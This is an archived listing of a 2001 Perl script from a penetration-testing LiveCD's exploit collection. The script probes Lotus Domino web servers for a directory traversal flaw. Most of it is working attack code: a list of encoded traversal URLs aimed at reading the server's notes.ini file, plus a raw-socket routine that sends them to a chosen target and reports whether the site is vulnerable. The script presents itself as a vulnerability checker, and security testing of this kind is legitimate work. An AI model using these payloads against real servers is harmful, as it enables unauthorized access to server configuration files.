home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / domino / nsfcheck.pl < prev   
Encoding:
Perl Script  |  2005-02-12  |  2.7 KB  |  81 lines
  1. #!/usr/bin/perl
  2. # PERL script to test a Domino server for directory
  3. # traversal vulnerability.  (BugTraq ID 2173,
  4. # http://www.securityfocus.com/bid/2173)
  5. #
  6. # Michael Smith, http://www.netlocksmith.com
  7. # 01/15/2001
  8. #
  9. # Credit & thanks to all of these folks:
  10. #
  11. # - To Georgi Guninski, http://www.guninski.com,
  12. #   who discovered the original vulnerability,
  13. #   and Ralph Moonen of KPMG, who found additional
  14. #   URL variations
  15. #
  16. # - Roelof Temmingh, http://www.sensepost.com,
  17. #   author of unicodecheck.pl, on which this
  18. #   script is based
  19. #
  20. # - Rain Forest Puppy, http://www.wiretrip.com,
  21. #   author of Sendraw routine
  22. #
  23. use Socket;
  24. # --------------init
  25. if ($#ARGV<0) {die "Usage: nsfcheck targetIP[:port]";}
  26. ($host,$port)=split(/:/,@ARGV[0]);
  27. if ($port=="") {$port=80;}
  28. print "Testing $host:$port\n";
  29. $target = inet_aton($host);
  30.  
  31. @notesvuln=(    "/%00%00.nsf/../lotus/domino/notes.ini",
  32.         "/%00%20.nsf/../lotus/domino/notes.ini",
  33.         "/%00%c0%af.nsf/../lotus/domino/notes.ini",
  34.         "/%00...nsf/../lotus/domino/notes.ini",
  35.         "/%00.nsf//../lotus/domino/notes.ini",
  36.         "/%00.nsf/../lotus/domino/notes.ini",
  37.         "/%00.nsf/..//lotus/domino/notes.ini",
  38.         "/%00.nsf/../../lotus/domino/notes.ini",
  39.         "/%00.nsf.nsf/../lotus/domino/notes.ini",
  40.         "/%20%00.nsf/../lotus/domino/notes.ini",
  41.         "/%20.nsf//../lotus/domino/notes.ini",
  42.         "/%20.nsf/..//lotus/domino/notes.ini",
  43.         "/%c0%af%00.nsf/../lotus/domino/notes.ini",
  44.         "/%c0%af.nsf//../lotus/domino/notes.ini",
  45.         "/%c0%af.nsf/..//lotus/domino/notes.ini",
  46.         "/...nsf//../lotus/domino/notes.ini",
  47.         "/...nsf/..//lotus/domino/notes.ini",
  48.         "/.nsf///../lotus/domino/notes.ini",
  49.         "/.nsf//../lotus/domino/notes.ini",
  50.         "/.nsf//..//lotus/domino/notes.ini",
  51.         "/.nsf/../lotus/domino/notes.ini",
  52.         "/.nsf/../lotus/domino/notes.ini",
  53.         "/.nsf/..///lotus/domino/notes.ini",
  54.         "/.nsf%00.nsf/../lotus/domino/notes.ini",
  55.         "/.nsf.nsf//../lotus/domino/notes.ini",
  56.         "/.nsf.nsf/..//lotus/domino/notes.ini");
  57.  
  58. # ----- Test each possible version of vulnerability -----
  59. foreach $notespath (@notesvuln) {
  60.    my @results=sendraw("GET ".$notespath." HTTP\/1.0\r\n\r\n");
  61.    foreach $line (@results){
  62.       if ($line =~ /\[Notes\]/) {$flag=1;}
  63.    }
  64. }
  65. if ($flag==0) {die("No vulnerability found at this address.\n");}
  66. else {die("This site is vulnerable.\n");}
  67.  
  68. # ------------- Sendraw
  69. sub sendraw {
  70.         my ($pstr)=@_;
  71.         socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
  72.                 die("Socket problems\n");
  73.         if(connect(S,pack "SnA4x8",2,$port,$target)){
  74.                 my @in;
  75.                 select(S);      $|=1;   print $pstr;
  76.                 while(<S>){ push @in, $_;}
  77.                 select(STDOUT); close(S); return @in;
  78.         } else { die("Can't connect...\n"); }
  79. }
  80. # ---------------------- 
  81.